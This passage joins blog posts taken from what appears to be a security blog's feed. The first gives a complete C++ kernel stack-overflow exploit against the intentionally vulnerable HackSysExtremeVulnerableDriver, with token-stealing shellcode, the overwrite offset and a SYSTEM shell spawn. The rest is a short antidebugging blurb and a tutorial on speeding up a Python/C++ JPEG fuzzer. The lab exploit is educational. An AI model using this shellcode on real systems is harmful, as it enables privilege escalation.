So hopefully, we can copy 0x800 bytes, and then start overwriting kernel memory on the stack where we can strategically place a pointer to shellcode. Like I said previously, you don’t want a huge overwrite here. I started at 0x800 and worked my way up 4 bytes at a time using a little pattern creating tool I made here until I got a crash.

Incrementing 4 bytes at a time I finally got a crash with a 0x830 buffer length where the last 4 bytes are 0BAD0B0B0.

Getting a Crash

After incrementing methodically from a buffer size of 0x800, and remember that this includes a 4 byte terminator string or else we’ll never stop copying into kernel space and BSOD the host, I finally got an exception that tried to execute code at 41414141 with a total buffer size of 0x830. (I also got an exception when I used a smaller buffer size of 0x82C but the address referenced was a NULL). In this buffer, I had 0x82C \x41 chars and then our terminator. So I figured our offset was going to be at 0x828 or 2088 in decimal, but just to make sure I used my pattern python script to get the exact offset.

root@kali:~# python3 pattern.py -c 2092 -cpp
char pattern[] = 
"0Aa0Ab0Ac0Ad0Ae0Af0Ag0Ah0Ai0Aj0Ak0Al0Am0An0Ao0Ap0Aq0Ar0As0At0Au0Av0Aw0Ax0Ay0Az"
"0A00A10A20A30A40A50A60A70A80A90AA0AB0AC0AD0AE0AF0AG0AH0AI0AJ0AK0AL0AM0AN0AO0AP"
"0AQ0AR0AS0AT0AU0AV0AW0AX0AY0AZ0Ba0Bb0Bc0Bd0Be0Bf0Bg0Bh0Bi0Bj0Bk0Bl0Bm0Bn0Bo0Bp"
"0Bq0Br0Bs0Bt0Bu0Bv0Bw0Bx0By0Bz0B00B10B20B30B40B50B60B70B80B90BA0BB0BC0BD0BE0BF"
"0BG0BH0BI0BJ0BK0BL0BM0BN0BO0BP0BQ0BR0BS0BT0BU0BV0BW0BX0BY0BZ0Ca0Cb0Cc0Cd0Ce0Cf"
"0Cg0Ch0Ci0Cj0Ck0Cl0Cm0Cn0Co0Cp0Cq0Cr0Cs0Ct0Cu0Cv0Cw0Cx0Cy0Cz0C00C10C20C30C40C5"
"0C60C70C80C90CA0CB0CC0CD0CE0CF0CG0CH0CI0CJ0CK0CL0CM0CN0CO0CP0CQ0CR0CS0CT0CU0CV"
"0CW0CX0CY0CZ0Da0Db0Dc0Dd0De0Df0Dg0Dh0Di0Dj0Dk0Dl0Dm0Dn0Do0Dp0Dq0Dr0Ds0Dt0Du0Dv"
"0Dw0Dx0Dy0Dz0D00D10D20D30D40D50D60D70D80D90DA0DB0DC0DD0DE0DF0DG0DH0DI0DJ0DK0DL"
"0DM0DN0DO0DP0DQ0DR0DS0DT0DU0DV0DW0DX0DY0DZ0Ea0Eb0Ec0Ed0Ee0Ef0Eg0Eh0Ei0Ej0Ek0El"
"0Em0En0Eo0Ep0Eq0Er0Es0Et0Eu0Ev0Ew0Ex0Ey0Ez0E00E10E20E30E40E50E60E70E80E90EA0EB"
"0EC0ED0EE0EF0EG0EH0EI0EJ0EK0EL0EM0EN0EO0EP0EQ0ER0ES0ET0EU0EV0EW0EX0EY0EZ0Fa0Fb"
"0Fc0Fd0Fe0Ff0Fg0Fh0Fi0Fj0Fk0Fl0Fm0Fn0Fo0Fp0Fq0Fr0Fs0Ft0Fu0Fv0Fw0Fx0Fy0Fz0F00F1"
"0F20F30F40F50F60F70F80F90FA0FB0FC0FD0FE0FF0FG0FH0FI0FJ0FK0FL0FM0FN0FO0FP0FQ0FR"
"0FS0FT0FU0FV0FW0FX0FY0FZ0Ga0Gb0Gc0Gd0Ge0Gf0Gg0Gh0Gi0Gj0Gk0Gl0Gm0Gn0Go0Gp0Gq0Gr"
"0Gs0Gt0Gu0Gv0Gw0Gx0Gy0Gz0G00G10G20G30G40G50G60G70G80G90GA0GB0GC0GD0GE0GF0GG0GH"
"0GI0GJ0GK0GL0GM0GN0GO0GP0GQ0GR0GS0GT0GU0GV0GW0GX0GY0GZ0Ha0Hb0Hc0Hd0He0Hf0Hg0Hh"
"0Hi0Hj0Hk0Hl0Hm0Hn0Ho0Hp0Hq0Hr0Hs0Ht0Hu0Hv0Hw0Hx0Hy0Hz0H00H10H20H30H40H50H60H7"
"0H80H90HA0HB0HC0HD0HE0HF0HG0HH0HI0HJ0HK0HL0HM0HN0HO0HP0HQ0HR0HS0HT0HU0HV0HW0HX"
"0HY0HZ0Ia0Ib0Ic0Id0Ie0If0Ig0Ih0Ii0Ij0Ik0Il0Im0In0Io0Ip0Iq0Ir0Is0It0Iu0Iv0Iw0Ix"
"0Iy0Iz0I00I10I20I30I40I50I60I70I80I90IA0IB0IC0ID0IE0IF0IG0IH0II0IJ0IK0IL0IM0IN"
"0IO0IP0IQ0IR0IS0IT0IU0IV0IW0IX0IY0IZ0Ja0Jb0Jc0Jd0Je0Jf0Jg0Jh0Ji0Jj0Jk0Jl0Jm0Jn"
"0Jo0Jp0Jq0Jr0Js0Jt0Ju0Jv0Jw0Jx0Jy0Jz0J00J10J20J30J40J50J60J70J80J90JA0JB0JC0JD"
"0JE0JF0JG0JH0JI0JJ0JK0JL0JM0JN0JO0JP0JQ0JR0JS0JT0JU0JV0JW0JX0JY0JZ0Ka0Kb0Kc0Kd"
"0Ke0Kf0Kg0Kh0Ki0Kj0Kk0Kl0Km0Kn0Ko0Kp0Kq0Kr0Ks0Kt0Ku0Kv0Kw0Kx0Ky0Kz0K00K10K20K3"
"0K40K50K60K70K80K90KA0KB0KC0KD0KE0KF0KG0KH0KI0KJ0KK0KL0KM0KN0KO0KP0KQ0KR0KS0KT"
"0KU0KV0KW0KX0KY0KZ0La0Lb0Lc0Ld0Le0Lf0Lg0Lh0Li0Lj0Lk0Ll0Lm0Ln0Lo0";

I then added the terminator to the end like so.

---SNIP---
...Lm0Ln0Lo0\xb0\xb0\xd0\xba";

And we see I got an access violation at 306f4c30.

Using pattern again, I got the exact offset and we confirmed our suspicions.

root@kali:~# python3 pattern.py -o 306f4c30
Exact offset found at position: 2088

From here on out, this plays out just like stack buffer overflow post, so please reference those posts if you have any questions! We initialize our shellcode, create a RWX buffer for it, move it there, and then use the address of the buffer to overwrite eip at that offset we found.

Final Code

#include <iostream>
#include <string>
#include <iomanip>

#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x222027

HANDLE get_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver.\n";
        exit(1);
    }

    cout << "[>] Handle to HackSysExtremeVulnerableDriver: " << hex << hFile
        << "\n";

    return hFile;
}

void send_payload(HANDLE hFile) {

    char shellcode[] = (
        "\x60"
        "\x64\xA1\x24\x01\x00\x00"
        "\x8B\x40\x50"
        "\x89\xC1"
        "\x8B\x98\xF8\x00\x00\x00"
        "\xBA\x04\x00\x00\x00"
        "\x8B\x80\xB8\x00\x00\x00"
        "\x2D\xB8\x00\x00\x00"
        "\x39\x90\xB4\x00\x00\x00"
        "\x75\xED"
        "\x8B\x90\xF8\x00\x00\x00"
        "\x89\x91\xF8\x00\x00\x00"
        "\x61"
        "\x5d"
        "\xc2\x08\x00"
        );

    LPVOID shellcode_address = VirtualAlloc(NULL,
        sizeof(shellcode),
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memcpy(shellcode_address, shellcode, sizeof(shellcode));

    cout << "[>] RWX shellcode allocated at: " << hex << shellcode_address
        << "\n";

    BYTE input_buff[0x830] = { 0 };

    // 'A' * 0x828
    memset(input_buff, '\x41', 0x828);

    memcpy(input_buff + 0x828, &shellcode_address, 0x4);

    BYTE terminator[] = "\xb0\xb0\xd0\xba";

    memcpy(input_buff + 0x82c, &terminator, 0x4);

    cout << "[>] Sending buffer of size: " << sizeof(input_buff) << "\n";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        &input_buff,
        ULONG_MAX,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {
        cout << "[!] Payload failed.\n";
    }
}

void spawn_shell()
{
    PROCESS_INFORMATION Process_Info;
    ZeroMemory(&Process_Info, 
        sizeof(Process_Info));
    
    STARTUPINFOA Startup_Info;
    ZeroMemory(&Startup_Info, 
        sizeof(Startup_Info));
    
    Startup_Info.cb = sizeof(Startup_Info);

    CreateProcessA("C:\\Windows\\System32\\cmd.exe",
        NULL, 
        NULL, 
        NULL, 
        0, 
        CREATE_NEW_CONSOLE, 
        NULL, 
        NULL, 
        &Startup_Info, 
        &Process_Info);
}

int main()
{
    HANDLE hFile = get_handle();

    send_payload(hFile);

    spawn_shell();
}

Conclusion

This should net you a system shell.

The universal antidebugger, x64 revamped

10 April 2020 at 00:00
A single step for a debugger a giant leap for the obfuscator. When a debugger hits a breakpoint, it can perform single-stepping into the subsequent instructions by halting itself each time. To do so, it uses a specially crafted flag called Trap Flag (TF) residing at 0x8th bit position inside the EFLAGS x86 register. If the Trap Flag is enabled, the processor then triggers an interrupt after each instruction has been executed.

Fuzzing Like A Caveman 2: Improving Performance

By: h0mbre
8 April 2020 at 04:00

Introduction

In this episode of ‘Fuzzing like a Caveman’ we’ll just be looking at improving the performance of our previous fuzzer. This means there won’t be any wholesale changes, we’re simply looking to improve upon what we already had in the previous post. This means we’ll still end up walking away from this blogpost with a very basic mutation fuzzer (please let it be faster!!) and hopefully some more bugs on a different target. We won’t really tinker with multi-threading or multi-processing in this post, we will save that for subsequent fuzzing posts.

I feel the need to add a DISCLAIMER here that I am not a professional developer, far from it. I’m simply not experienced enough with programming at this point to recognize opportunities to improve performance the way a more seasoned programmer would. I’m going to use my crude skillset and my limited knowledge of programming to improve our previous fuzzer, that’s it. The code produced will not be pretty, it will not be perfect, but it will be better than what we had in the previous post. It should also be mentioned that all testing was done on VMWare Workstation on an x86 Kali VM with 1 CPU and 1 Core.

Let’s take a moment to define ‘better’ in the context of this blog post as well. What I mean by ‘better’ here is that we can iterate through n fuzzing iterations faster, that’s it. We’ll take the time to completely rewrite the fuzzer, use a cool language, pick a hardened target, and employ more advanced fuzzing techniques at a later date. :)

Obviously, if you haven’t read the previous post you will be LOST!

Analyzing Our Fuzzer

Our last fuzzer, quite plainly, worked! We found some bugs in our target. But we knew we left some optimizations on the table when we turned in our homework. Let’s again look at the fuzzer from the last post (with minor changes for testing purposes):

#!/usr/bin/env python3

import sys
import random
from pexpect import run
from pipes import quote

# read bytes from our valid JPEG and return them in a mutable bytearray 
def get_bytes(filename):

	f = open(filename, "rb").read()

	return bytearray(f)

def bit_flip(data):

	num_of_flips = int((len(data) - 4) * .01)

	indexes = range(4, (len(data) - 4))

	chosen_indexes = []

	# iterate selecting indexes until we've hit our num_of_flips number
	counter = 0
	while counter < num_of_flips:
		chosen_indexes.append(random.choice(indexes))
		counter += 1

	for x in chosen_indexes:
		current = data[x]
		current = (bin(current).replace("0b",""))
		current = "0" * (8 - len(current)) + current
		
		indexes = range(0,8)

		picked_index = random.choice(indexes)

		new_number = []

		# our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0']
		for i in current:
			new_number.append(i)

		# if the number at our randomly selected index is a 1, make it a 0, and vice versa
		if new_number[picked_index] == "1":
			new_number[picked_index] = "0"
		else:
			new_number[picked_index] = "1"

		# create our new binary string of our bit-flipped number
		current = ''
		for i in new_number:
			current += i

		# convert that string to an integer
		current = int(current,2)

		# change the number in our byte array to our new number we just constructed
		data[x] = current

	return data

def magic(data):

	magic_vals = [
	(1, 255),
	(1, 255),
	(1, 127),
	(1, 0),
	(2, 255),
	(2, 0),
	(4, 255),
	(4, 0),
	(4, 128),
	(4, 64),
	(4, 127)
	]

	picked_magic = random.choice(magic_vals)

	length = len(data) - 8
	index = range(0, length)
	picked_index = random.choice(index)

	# here we are hardcoding all the byte overwrites for all of the tuples that begin (1, )
	if picked_magic[0] == 1:
		if picked_magic[1] == 255:			# 0xFF
			data[picked_index] = 255
		elif picked_magic[1] == 127:		# 0x7F
			data[picked_index] = 127
		elif picked_magic[1] == 0:			# 0x00
			data[picked_index] = 0

	# here we are hardcoding all the byte overwrites for all of the tuples that begin (2, )
	elif picked_magic[0] == 2:
		if picked_magic[1] == 255:			# 0xFFFF
			data[picked_index] = 255
			data[picked_index + 1] = 255
		elif picked_magic[1] == 0:			# 0x0000
			data[picked_index] = 0
			data[picked_index + 1] = 0

	# here we are hardcoding all of the byte overwrites for all of the tuples that being (4, )
	elif picked_magic[0] == 4:
		if picked_magic[1] == 255:			# 0xFFFFFFFF
			data[picked_index] = 255
			data[picked_index + 1] = 255
			data[picked_index + 2] = 255
			data[picked_index + 3] = 255
		elif picked_magic[1] == 0:			# 0x00000000
			data[picked_index] = 0
			data[picked_index + 1] = 0
			data[picked_index + 2] = 0
			data[picked_index + 3] = 0
		elif picked_magic[1] == 128:		# 0x80000000
			data[picked_index] = 128
			data[picked_index + 1] = 0
			data[picked_index + 2] = 0
			data[picked_index + 3] = 0
		elif picked_magic[1] == 64:			# 0x40000000
			data[picked_index] = 64
			data[picked_index + 1] = 0
			data[picked_index + 2] = 0
			data[picked_index + 3] = 0
		elif picked_magic[1] == 127:		# 0x7FFFFFFF
			data[picked_index] = 127
			data[picked_index + 1] = 255
			data[picked_index + 2] = 255
			data[picked_index + 3] = 255
		
	return data

# create new jpg with mutated data
def create_new(data):

	f = open("mutated.jpg", "wb+")
	f.write(data)
	f.close()

def exif(counter,data):

    command = "exif mutated.jpg -verbose"

    out, returncode = run("sh -c " + quote(command), withexitstatus=1)

    if b"Segmentation" in out:
    	f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
    	f.write(data)
    	print("Segfault!")

    #if counter % 100 == 0:
    #	print(counter, end="\r")

if len(sys.argv) < 2:
	print("Usage: JPEGfuzz.py <valid_jpg>")

else:
	filename = sys.argv[1]
	counter = 0
	while counter < 1000:
		data = get_bytes(filename)
		functions = [0, 1]
		picked_function = random.choice(functions)
		picked_function = 1
		if picked_function == 0:
			mutated = magic(data)
			create_new(mutated)
			exif(counter,mutated)
		else:
			mutated = bit_flip(data)
			create_new(mutated)
			exif(counter,mutated)

		counter += 1

You may notice a few changes. We’ve:

  • commented out the print statement for the iterations counter every 100 iterations,
  • added print statements to notify us of any Segfaults,
  • hardcoded 1k iterations,
  • added this line: picked_function = 1 temporarily so that we eliminate any randomness in our testing and we only stick to one mutation method (bit_flip())

Let’s run this version of our fuzzer with some profiling instrumentation and we can really analyze how much time we spend where in our program’s execution.

We can make use of the cProfile Python module and see where we spend our time during 1,000 fuzzing iterations. The program takes a filepath argument to a valid JPEG file if you remember, so our complete command line syntax will be: python3 -m cProfile -s cumtime JPEGfuzzer.py ~/jpegs/Canon_40D.jpg.

It should also be noted that adding this cProfile instrumentation could slow down performance. I tested without it and for the iteration sizes we use in this post, it didn’t seem to make a significant difference.

After letting this run, we see our program output and we get to see where we spent the most time during execution.

2476093 function calls (2474812 primitive calls) in 122.084 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     33/1    0.000    0.000  122.084  122.084 {built-in method builtins.exec}
        1    0.108    0.108  122.084  122.084 blog.py:3(<module>)
     1000    0.090    0.000  118.622    0.119 blog.py:140(exif)
     1000    0.080    0.000  118.452    0.118 run.py:7(run)
     5432  103.761    0.019  103.761    0.019 {built-in method time.sleep}
     1000    0.028    0.000  100.923    0.101 pty_spawn.py:316(close)
     1000    0.025    0.000  100.816    0.101 ptyprocess.py:387(close)
     1000    0.061    0.000    9.949    0.010 pty_spawn.py:36(__init__)
     1000    0.074    0.000    9.764    0.010 pty_spawn.py:239(_spawn)
     1000    0.041    0.000    8.682    0.009 pty_spawn.py:312(_spawnpty)
     1000    0.266    0.000    8.641    0.009 ptyprocess.py:178(spawn)
     1000    0.011    0.000    7.491    0.007 spawnbase.py:240(expect)
     1000    0.036    0.000    7.479    0.007 spawnbase.py:343(expect_list)
     1000    0.128    0.000    7.409    0.007 expect.py:91(expect_loop)
     6432    6.473    0.001    6.473    0.001 {built-in method posix.read}
     5432    0.089    0.000    3.818    0.001 pty_spawn.py:415(read_nonblocking)
     7348    0.029    0.000    3.162    0.000 utils.py:130(select_ignore_interrupts)
     7348    3.127    0.000    3.127    0.000 {built-in method select.select}
     1000    0.790    0.001    1.777    0.002 blog.py:15(bit_flip)
     1000    0.015    0.000    1.311    0.001 blog.py:134(create_new)
     1000    0.100    0.000    1.101    0.001 pty.py:79(fork)
     1000    1.000    0.001    1.000    0.001 {built-in method posix.forkpty}
-----SNIP-----

For this type of analysis, we don’t really care about how many segfaults we had since we’re not really tinkering much with the mutation methods or comparing different methods. Granted there will be some randomness here, as a crash would necessitate extra processing, but this will do for now.

I snipped only the sections of code where we spent more than 1.0 seconds cumulatively. You can see we spent by far the most time in blog.py:140(exif). A whopping 118 seconds out of 122 seconds total. Our exif() function seems to be a major problem in our performance.

We can see that most of the time we spent underneath that function was directly related to the function, we see plenty of appeals to the pty module from our pexpect usage. Let’s rewrite our function using Popen from the subprocess module and see if we can improve performance here!

Here is our redefined exif() function:

def exif(counter,data):

    p = Popen(["exif", "mutated.jpg", "-verbose"], stdout=PIPE, stderr=PIPE)
    (out,err) = p.communicate()

    if p.returncode == -11:
    	f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
    	f.write(data)
    	print("Segfault!")

    #if counter % 100 == 0:
    #	print(counter, end="\r")

Here is our performance report:

2065580 function calls (2065443 primitive calls) in 2.756 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000    2.756    2.756 {built-in method builtins.exec}
        1    0.038    0.038    2.756    2.756 subpro.py:3(<module>)
     1000    0.020    0.000    1.917    0.002 subpro.py:139(exif)
     1000    0.026    0.000    1.121    0.001 subprocess.py:681(__init__)
     1000    0.099    0.000    1.045    0.001 subprocess.py:1412(_execute_child)
 -----SNIP-----

What a difference. This fuzzer, with the redefined exif() function performed the same amount of work in only 2 seconds!! That’s insane! The old fuzzer: 122 seconds, new fuzzer: 2.7 seconds.

Improving Further in Python

Let’s try to continue improving our fuzzer all within Python. First, let’s get a good benchmark for us to perform against. We’ll get our optimized Python fuzzer to iterate through 50,000 fuzzing iterations and we’ll use the cProfile module again to get some fine-grained statistics about where we spend our time.

102981395 function calls (102981258 primitive calls) in 141.488 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000  141.488  141.488 {built-in method builtins.exec}
        1    1.724    1.724  141.488  141.488 subpro.py:3(<module>)
    50000    0.992    0.000  102.588    0.002 subpro.py:139(exif)
    50000    1.248    0.000   61.562    0.001 subprocess.py:681(__init__)
    50000    5.034    0.000   57.826    0.001 subprocess.py:1412(_execute_child)
    50000    0.437    0.000   39.586    0.001 subprocess.py:920(communicate)
    50000    2.527    0.000   39.064    0.001 subprocess.py:1662(_communicate)
   208254   37.508    0.000   37.508    0.000 {built-in method posix.read}
   158238    0.577    0.000   28.809    0.000 selectors.py:402(select)
   158238   28.131    0.000   28.131    0.000 {method 'poll' of 'select.poll' objects}
    50000   11.784    0.000   25.819    0.001 subpro.py:14(bit_flip)
  7950000    3.666    0.000   10.431    0.000 random.py:256(choice)
    50000    8.421    0.000    8.421    0.000 {built-in method _posixsubprocess.fork_exec}
    50000    0.162    0.000    7.358    0.000 subpro.py:133(create_new)
  7950000    4.096    0.000    6.130    0.000 random.py:224(_randbelow)
   203090    5.016    0.000    5.016    0.000 {built-in method io.open}
    50000    4.211    0.000    4.211    0.000 {method 'close' of '_io.BufferedRandom' objects}
    50000    1.643    0.000    4.194    0.000 os.py:617(get_exec_path)
    50000    1.733    0.000    3.356    0.000 subpro.py:8(get_bytes)
 35866791    2.635    0.000    2.635    0.000 {method 'append' of 'list' objects}
   100000    0.070    0.000    1.960    0.000 subprocess.py:1014(wait)
   100000    0.252    0.000    1.902    0.000 selectors.py:351(register)
   100000    0.444    0.000    1.890    0.000 subprocess.py:1621(_wait)
   100000    0.675    0.000    1.583    0.000 selectors.py:234(register)
   350000    0.432    0.000    1.501    0.000 subprocess.py:1471(<genexpr>)
 12074141    1.434    0.000    1.434    0.000 {method 'getrandbits' of '_random.Random' objects}
    50000    0.059    0.000    1.358    0.000 subprocess.py:1608(_try_wait)
    50000    1.299    0.000    1.299    0.000 {built-in method posix.waitpid}
   100000    0.488    0.000    1.058    0.000 os.py:674(__getitem__)
   100000    1.017    0.000    1.017    0.000 {method 'close' of '_io.BufferedReader' objects}
-----SNIP-----

50,000 iterations took us a grand total of 141 seconds, this is great performance compared to what we were dealing with. We previously took 122 seconds to do 1,000 iterations! Once again filtering on only time where we spent over 1.0 seconds, we see that we again spent most of our time in exif() but we also see some performance issues in bit_flip() as we spent 25 cumulative seconds there. Let’s try to optimize that function a bit.

Let’s go ahead and repost what the old bit_flip() function looked like:

def bit_flip(data):

	num_of_flips = int((len(data) - 4) * .01)

	indexes = range(4, (len(data) - 4))

	chosen_indexes = []

	# iterate selecting indexes until we've hit our num_of_flips number
	counter = 0
	while counter < num_of_flips:
		chosen_indexes.append(random.choice(indexes))
		counter += 1

	for x in chosen_indexes:
		current = data[x]
		current = (bin(current).replace("0b",""))
		current = "0" * (8 - len(current)) + current
		
		indexes = range(0,8)

		picked_index = random.choice(indexes)

		new_number = []

		# our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0']
		for i in current:
			new_number.append(i)

		# if the number at our randomly selected index is a 1, make it a 0, and vice versa
		if new_number[picked_index] == "1":
			new_number[picked_index] = "0"
		else:
			new_number[picked_index] = "1"

		# create our new binary string of our bit-flipped number
		current = ''
		for i in new_number:
			current += i

		# convert that string to an integer
		current = int(current,2)

		# change the number in our byte array to our new number we just constructed
		data[x] = current

	return data

This function is admittedly a bit clumsy. We can simplify it greatly by utilizing better logic. I find this is often the case with programming in my limited experience, you can have all of the fancy esoteric programming knowledge you want, but if the logic behind your program is unsound, then the program’s performance will suffer.

Let’s reduce the amount of type conversions we do, for instance ints to str or vice versa, and let’s just get less code into our editor. We can accomplish what we want with a re-defined bit_flip() function as follows:

def bit_flip(data):

	length = len(data) - 4

	num_of_flips = int(length * .01)

	picked_indexes = []
	
	flip_array = [1,2,4,8,16,32,64,128]

	counter = 0
	while counter < num_of_flips:
		picked_indexes.append(random.choice(range(0,length)))
		counter += 1


	for x in picked_indexes:
		mask = random.choice(flip_array)
		data[x] = data[x] ^ mask

	return data

If we employ this new function and monitor the results, we get a performance grade of:

59376275 function calls (59376138 primitive calls) in 135.582 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000  135.582  135.582 {built-in method builtins.exec}
        1    1.940    1.940  135.582  135.582 subpro.py:3(<module>)
    50000    0.978    0.000  107.857    0.002 subpro.py:111(exif)
    50000    1.450    0.000   64.236    0.001 subprocess.py:681(__init__)
    50000    5.566    0.000   60.141    0.001 subprocess.py:1412(_execute_child)
    50000    0.534    0.000   42.259    0.001 subprocess.py:920(communicate)
    50000    2.827    0.000   41.637    0.001 subprocess.py:1662(_communicate)
   199549   38.249    0.000   38.249    0.000 {built-in method posix.read}
   149537    0.555    0.000   30.376    0.000 selectors.py:402(select)
   149537   29.722    0.000   29.722    0.000 {method 'poll' of 'select.poll' objects}
    50000    3.993    0.000   14.471    0.000 subpro.py:14(bit_flip)
  7950000    3.741    0.000   10.316    0.000 random.py:256(choice)
    50000    9.973    0.000    9.973    0.000 {built-in method _posixsubprocess.fork_exec}
    50000    0.163    0.000    7.034    0.000 subpro.py:105(create_new)
  7950000    3.987    0.000    5.952    0.000 random.py:224(_randbelow)
   202567    4.966    0.000    4.966    0.000 {built-in method io.open}
    50000    4.042    0.000    4.042    0.000 {method 'close' of '_io.BufferedRandom' objects}
    50000    1.539    0.000    3.828    0.000 os.py:617(get_exec_path)
    50000    1.843    0.000    3.607    0.000 subpro.py:8(get_bytes)
   100000    0.074    0.000    2.133    0.000 subprocess.py:1014(wait)
   100000    0.463    0.000    2.059    0.000 subprocess.py:1621(_wait)
   100000    0.274    0.000    2.046    0.000 selectors.py:351(register)
   100000    0.782    0.000    1.702    0.000 selectors.py:234(register)
    50000    0.055    0.000    1.507    0.000 subprocess.py:1608(_try_wait)
    50000    1.452    0.000    1.452    0.000 {built-in method posix.waitpid}
   350000    0.424    0.000    1.436    0.000 subprocess.py:1471(<genexpr>)
 12066317    1.339    0.000    1.339    0.000 {method 'getrandbits' of '_random.Random' objects}
   100000    0.466    0.000    1.048    0.000 os.py:674(__getitem__)
   100000    1.014    0.000    1.014    0.000 {method 'close' of '_io.BufferedReader' objects}
-----SNIP-----

As you can see from the metrics, we only spend 14 cumulative seconds in bit_flip() at this point! In our last go-round, we spent 25 seconds here, this is almost twice as fast at this point. We’re doing a good job of optimizing in my opinion here.

Now that we have our ideal Python benchmark (keep in mind there might be opportunities for multi-processing or multi-threading but let’s save this idea for another time), let’s go ahead and port our fuzzer to a new language, C++ and test the performance.

New Fuzzer in C++

To get started, let’s just go ahead and flat out run our newly optimized python fuzzer through 100,000 fuzzing iterations and see how long in total it takes.

118749892 function calls (118749755 primitive calls) in 256.881 seconds

100k iterations in only 256 seconds! That destroys our previous fuzzer.

That will be our benchmark we try to beat in C++. Now, as unfamiliar as I am with the nuances of Python development, multiply that by 10 and you’ll have my unfamiliarity with C++. This code might be laughable to some, but it’s the best I could manage at the present moment and we can explain each function as it relates to our previous Python code.

Let’s go through, function by function, and describe their implementation.

//
// this function simply creates a stream by opening a file in binary mode;
// finds the end of file, creates a string 'data', resizes data to be the same
// size as the file moves the file pointer back to the beginning of the file;
// reads the data from the into the data string;
//
std::string get_bytes(std::string filename)
{
	std::ifstream fin(filename, std::ios::binary);

	if (fin.is_open())
	{
		fin.seekg(0, std::ios::end);
		std::string data;
		data.resize(fin.tellg());
		fin.seekg(0, std::ios::beg);
		fin.read(&data[0], data.size());

		return data;
	}

	else
	{
		std::cout << "Failed to open " << filename << ".\n";
		exit(1);
	}

}

This function, as my comment says, simply retrives a byte string from our target file, which in the case of our testing will still be Canon_40D.jpg.

//
// this will take 1% of the bytes from our valid jpeg and
// flip a random bit in the byte and return the altered string
//
std::string bit_flip(std::string data)
{
	
	int size = (data.length() - 4);
	int num_of_flips = (int)(size * .01);

	// get a vector full of 1% of random byte indexes
	std::vector<int> picked_indexes;
	for (int i = 0; i < num_of_flips; i++)
	{
		int picked_index = rand() % size;
		picked_indexes.push_back(picked_index);
	}

	// iterate through the data string at those indexes and flip a bit
	for (int i = 0; i < picked_indexes.size(); ++i)
	{
		int index = picked_indexes[i];
		char current = data.at(index);
		int decimal = ((int)current & 0xff);
		
		int bit_to_flip = rand() % 8;
		
		decimal ^= 1 << bit_to_flip;
		decimal &= 0xff;
		
		data[index] = (char)decimal;
	}

	return data;

}

This function is a direct equivalent of our bit_flip() function in our Python script.

//
// takes mutated string and creates new jpeg with it;
//
void create_new(std::string mutated)
{
	std::ofstream fout("mutated.jpg", std::ios::binary);

	if (fout.is_open())
	{
		fout.seekp(0, std::ios::beg);
		fout.write(&mutated[0], mutated.size());
	}
	else
	{
		std::cout << "Failed to create mutated.jpg" << ".\n";
		exit(1);
	}

}

This function will simply create a temporary mutated.jpg file, similar to our create_new() function that we had in the Python script.

//
// function to run a system command and store the output as a string;
// https://www.jeremymorgan.com/tutorials/c-programming/how-to-capture-the-output-of-a-linux-command-in-c/
//
std::string get_output(std::string cmd)
{
	std::string output;
	FILE * stream;
	char buffer[256];

	stream = popen(cmd.c_str(), "r");
	if (stream)
	{
		while (!feof(stream))
			if (fgets(buffer, 256, stream) != NULL) output.append(buffer);
				pclose(stream);
	}

	return output;

}

//
// we actually run our exiv2 command via the get_output() func;
// retrieve the output in the form of a string and then we can parse the string;
// we'll save all the outputs that result in a segfault or floating point except;
//
void exif(std::string mutated, int counter)
{
	std::string command = "exif mutated.jpg -verbose 2>&1";

	std::string output = get_output(command);

	std::string segfault = "Segmentation";
	std::string floating_point = "Floating";

	std::size_t pos1 = output.find(segfault);
	std::size_t pos2 = output.find(floating_point);

	if (pos1 != -1)
	{
		std::cout << "Segfault!\n";
		std::ostringstream oss;
		oss << "/root/cppcrashes/crash." << counter << ".jpg";
		std::string filename = oss.str();
		std::ofstream fout(filename, std::ios::binary);

		if (fout.is_open())
			{
				fout.seekp(0, std::ios::beg);
				fout.write(&mutated[0], mutated.size());
			}
		else
		{
			std::cout << "Failed to create " << filename << ".jpg" << ".\n";
			exit(1);
		}
	}
	else if (pos2 != -1)
	{
		std::cout << "Floating Point!\n";
		std::ostringstream oss;
		oss << "/root/cppcrashes/crash." << counter << ".jpg";
		std::string filename = oss.str();
		std::ofstream fout(filename, std::ios::binary);

		if (fout.is_open())
			{
				fout.seekp(0, std::ios::beg);
				fout.write(&mutated[0], mutated.size());
			}
		else
		{
			std::cout << "Failed to create " << filename << ".jpg" << ".\n";
			exit(1);
		}
	}
}

These two functions work together. get_output takes a C++ string as a parameter and will run that command on the operating system and capture the output. The function then returns the output as a string to the calling function exif().

exif() will take the output and look for Segmentation fault or Floating point exception errors and then if found, will write those bytes to a file and save them as a crash.<counter>.jpg file. Very similar to our Python fuzzer.

//
// simply generates a vector of strings that are our 'magic' values;
//
std::vector<std::string> vector_gen()
{
	std::vector<std::string> magic;

	using namespace std::string_literals;

	magic.push_back("\xff");
	magic.push_back("\x7f");
	magic.push_back("\x00"s);
	magic.push_back("\xff\xff");
	magic.push_back("\x7f\xff");
	magic.push_back("\x00\x00"s);
	magic.push_back("\xff\xff\xff\xff");
	magic.push_back("\x80\x00\x00\x00"s);
	magic.push_back("\x40\x00\x00\x00"s);
